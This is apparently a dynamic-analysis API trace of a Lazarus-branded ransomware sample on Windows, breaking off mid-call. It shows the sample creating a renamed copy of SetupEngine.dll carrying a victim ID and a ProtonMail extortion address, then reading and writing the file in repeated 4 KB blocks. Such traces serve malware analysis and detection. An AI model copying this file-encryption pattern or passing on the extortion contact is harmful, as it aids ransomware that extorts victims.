[0079.379] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158)) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0079.379] AreFileApisANSI () returned 1 [0079.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0079.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0079.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0079.380] GetLastError () returned 0x0 [0079.380] SetLastError (dwErrCode=0x0) [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1b8 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0079.380] GetLastError () returned 0x0 [0079.380] SetLastError (dwErrCode=0x0) [0079.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68d60 [0079.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0079.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0079.380] AreFileApisANSI () returned 1 [0079.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0079.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x5a6b8 [0079.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=100 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 100 [0079.380] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0079.381] GetFileType (hFile=0x428) returned 0x1 [0079.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0079.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0079.381] AreFileApisANSI () returned 1 [0079.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0079.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6cf50 [0079.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6cf50, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 [0079.381] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0079.381] GetFileType (hFile=0x42c) returned 0x1 [0079.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0079.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0079.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0079.382] GetLastError () returned 0x0 [0079.382] SetLastError (dwErrCode=0x0) [0079.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0079.382] GetLastError () returned 0x0 [0079.382] SetLastError (dwErrCode=0x0) [0079.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0079.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0079.382] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0079.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0079.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0079.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0079.402] GetLastError () returned 0x0 [0079.402] SetLastError (dwErrCode=0x0) [0079.402] GetLastError () returned 0x0 [0079.402] SetLastError (dwErrCode=0x0) [0079.402] GetLastError () returned 0x0 [0079.402] SetLastError (dwErrCode=0x0) [0079.403] GetLastError () returned 0x0 [0079.403] SetLastError (dwErrCode=0x0) [0079.403] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.403] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.404] GetLastError () returned 0x0 [0079.404] SetLastError (dwErrCode=0x0) [0079.405] GetLastError () returned 0x0 [0079.405] SetLastError (dwErrCode=0x0) [0079.405] GetLastError () returned 0x0 [0079.405] SetLastError (dwErrCode=0x0) [0079.405] GetLastError () returned 0x0 [0079.405] SetLastError (dwErrCode=0x0) [0079.405] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.405] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.405] GetLastError () returned 0x0 [0079.405] SetLastError (dwErrCode=0x0) [0079.405] GetLastError () returned 0x0 [0079.405] SetLastError (dwErrCode=0x0) [0079.406] GetLastError () returned 0x0 [0079.406] SetLastError (dwErrCode=0x0) [0079.406] GetLastError () returned 0x0 [0079.406] SetLastError (dwErrCode=0x0) [0079.406] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.406] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.406] GetLastError () returned 0x0 [0079.406] SetLastError (dwErrCode=0x0) [0079.406] GetLastError () returned 0x0 [0079.406] SetLastError (dwErrCode=0x0) [0079.406] GetLastError () returned 0x0 [0079.407] SetLastError (dwErrCode=0x0) [0079.407] GetLastError () returned 0x0 [0079.407] SetLastError (dwErrCode=0x0) [0079.407] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.407] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.407] GetLastError () returned 0x0 [0079.407] SetLastError (dwErrCode=0x0) [0079.407] GetLastError () returned 0x0 [0079.407] SetLastError (dwErrCode=0x0) [0079.407] GetLastError () returned 0x0 [0079.407] SetLastError (dwErrCode=0x0) [0079.407] GetLastError () returned 0x0 [0079.408] SetLastError (dwErrCode=0x0) [0079.408] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.408] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.408] GetLastError () returned 0x0 [0079.408] SetLastError (dwErrCode=0x0) [0079.408] GetLastError () returned 0x0 [0079.408] SetLastError (dwErrCode=0x0) [0079.408] GetLastError () returned 0x0 [0079.408] SetLastError (dwErrCode=0x0) [0079.408] GetLastError () returned 0x0 [0079.408] SetLastError (dwErrCode=0x0) [0079.408] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.409] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.409] GetLastError () returned 0x0 [0079.409] SetLastError (dwErrCode=0x0) [0079.409] GetLastError () returned 0x0 [0079.409] SetLastError (dwErrCode=0x0) [0079.409] GetLastError () returned 0x0 [0079.409] SetLastError (dwErrCode=0x0) [0079.409] GetLastError () returned 0x0 [0079.409] SetLastError (dwErrCode=0x0) [0079.409] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.409] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.410] GetLastError () returned 0x0 [0079.410] SetLastError (dwErrCode=0x0) [0079.410] GetLastError () returned 0x0 [0079.410] SetLastError (dwErrCode=0x0) [0079.410] GetLastError () returned 0x0 [0079.410] SetLastError (dwErrCode=0x0) [0079.410] GetLastError () returned 0x0 [0079.410] SetLastError (dwErrCode=0x0) [0079.410] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.410] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.411] GetLastError () returned 0x0 [0079.411] SetLastError (dwErrCode=0x0) [0079.411] GetLastError () returned 0x0 [0079.411] SetLastError (dwErrCode=0x0) [0079.411] GetLastError () returned 0x0 [0079.411] SetLastError (dwErrCode=0x0) [0079.411] GetLastError () returned 0x0 [0079.411] SetLastError (dwErrCode=0x0) [0079.411] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.411] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.411] GetLastError () returned 0x0 [0079.411] SetLastError (dwErrCode=0x0) [0079.412] GetLastError () returned 0x0 [0079.412] SetLastError (dwErrCode=0x0) [0079.412] GetLastError () returned 0x0 [0079.412] SetLastError (dwErrCode=0x0) [0079.412] GetLastError () returned 0x0 [0079.412] SetLastError (dwErrCode=0x0) [0079.412] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.412] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.412] GetLastError () returned 0x0 [0079.412] SetLastError (dwErrCode=0x0) [0079.412] GetLastError () returned 0x0 [0079.412] SetLastError (dwErrCode=0x0) [0079.413] GetLastError () returned 0x0 [0079.413] SetLastError (dwErrCode=0x0) [0079.413] GetLastError () returned 0x0 [0079.413] SetLastError (dwErrCode=0x0) [0079.413] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.413] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.413] GetLastError () returned 0x0 [0079.413] SetLastError (dwErrCode=0x0) [0079.413] GetLastError () returned 0x0 [0079.413] SetLastError (dwErrCode=0x0) [0079.413] GetLastError () returned 0x0 [0079.413] SetLastError (dwErrCode=0x0) [0079.414] GetLastError () returned 0x0 [0079.414] SetLastError (dwErrCode=0x0) [0079.414] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.414] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.414] GetLastError () returned 0x0 [0079.414] SetLastError (dwErrCode=0x0) [0079.414] GetLastError () returned 0x0 [0079.414] SetLastError (dwErrCode=0x0) [0079.414] GetLastError () returned 0x0 [0079.414] SetLastError (dwErrCode=0x0) [0079.414] GetLastError () returned 0x0 [0079.414] SetLastError (dwErrCode=0x0) [0079.415] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.415] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.415] GetLastError () returned 0x0 [0079.415] SetLastError (dwErrCode=0x0) [0079.415] GetLastError () returned 0x0 [0079.415] SetLastError (dwErrCode=0x0) [0079.415] GetLastError () returned 0x0 [0079.415] SetLastError (dwErrCode=0x0) [0079.415] GetLastError () returned 0x0 [0079.415] SetLastError (dwErrCode=0x0) [0079.415] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.417] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.417] GetLastError () returned 0x0 [0079.417] SetLastError (dwErrCode=0x0) [0079.417] GetLastError () returned 0x0 [0079.417] SetLastError (dwErrCode=0x0) [0079.417] GetLastError () returned 0x0 [0079.418] SetLastError (dwErrCode=0x0) [0079.418] GetLastError () returned 0x0 [0079.418] SetLastError (dwErrCode=0x0) [0079.418] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.418] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.418] GetLastError () returned 0x0 [0079.418] SetLastError (dwErrCode=0x0) [0079.418] GetLastError () returned 0x0 [0079.418] SetLastError (dwErrCode=0x0) [0079.418] GetLastError () returned 0x0 [0079.418] SetLastError (dwErrCode=0x0) [0079.418] GetLastError () returned 0x0 [0079.418] SetLastError (dwErrCode=0x0) [0079.419] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.419] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.419] GetLastError () returned 0x0 [0079.419] SetLastError (dwErrCode=0x0) [0079.419] GetLastError () returned 0x0 [0079.419] SetLastError (dwErrCode=0x0) [0079.419] GetLastError () returned 0x0 [0079.419] SetLastError (dwErrCode=0x0) [0079.419] GetLastError () returned 0x0 [0079.419] SetLastError (dwErrCode=0x0) [0079.419] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.420] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.420] GetLastError () returned 0x0 [0079.420] SetLastError (dwErrCode=0x0) [0079.420] GetLastError () returned 0x0 [0079.420] SetLastError (dwErrCode=0x0) [0079.420] GetLastError () returned 0x0 [0079.420] SetLastError (dwErrCode=0x0) [0079.420] GetLastError () returned 0x0 [0079.420] SetLastError (dwErrCode=0x0) [0079.420] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.420] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.421] GetLastError () returned 0x0 [0079.421] SetLastError (dwErrCode=0x0) [0079.421] GetLastError () returned 0x0 [0079.421] SetLastError (dwErrCode=0x0) [0079.421] GetLastError () returned 0x0 [0079.421] SetLastError (dwErrCode=0x0) [0079.421] GetLastError () returned 0x0 [0079.421] SetLastError (dwErrCode=0x0) [0079.421] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.421] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.421] GetLastError () returned 0x0 [0079.422] SetLastError (dwErrCode=0x0) [0079.422] GetLastError () returned 0x0 [0079.422] SetLastError (dwErrCode=0x0) [0079.422] GetLastError () returned 0x0 [0079.422] SetLastError (dwErrCode=0x0) [0079.422] GetLastError () returned 0x0 [0079.422] SetLastError (dwErrCode=0x0) [0079.422] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.422] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.422] GetLastError () returned 0x0 [0079.422] SetLastError (dwErrCode=0x0) [0079.422] GetLastError () returned 0x0 [0079.422] SetLastError (dwErrCode=0x0) [0079.423] GetLastError () returned 0x0 [0079.423] SetLastError (dwErrCode=0x0) [0079.423] GetLastError () returned 0x0 [0079.423] SetLastError (dwErrCode=0x0) [0079.423] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.423] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.423] GetLastError () returned 0x0 [0079.423] SetLastError (dwErrCode=0x0) [0079.423] GetLastError () returned 0x0 [0079.423] SetLastError (dwErrCode=0x0) [0079.423] GetLastError () returned 0x0 [0079.423] SetLastError (dwErrCode=0x0) [0079.424] GetLastError () returned 0x0 [0079.424] SetLastError (dwErrCode=0x0) [0079.424] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.424] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.424] GetLastError () returned 0x0 [0079.424] SetLastError (dwErrCode=0x0) [0079.424] GetLastError () returned 0x0 [0079.424] SetLastError (dwErrCode=0x0) [0079.424] GetLastError () returned 0x0 [0079.424] SetLastError (dwErrCode=0x0) [0079.424] GetLastError () returned 0x0 [0079.424] SetLastError (dwErrCode=0x0) [0079.425] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.425] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.425] GetLastError () returned 0x0 [0079.425] SetLastError (dwErrCode=0x0) [0079.425] GetLastError () returned 0x0 [0079.425] SetLastError (dwErrCode=0x0) [0079.425] GetLastError () returned 0x0 [0079.425] SetLastError (dwErrCode=0x0) [0079.425] GetLastError () returned 0x0 [0079.425] SetLastError (dwErrCode=0x0) [0079.425] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 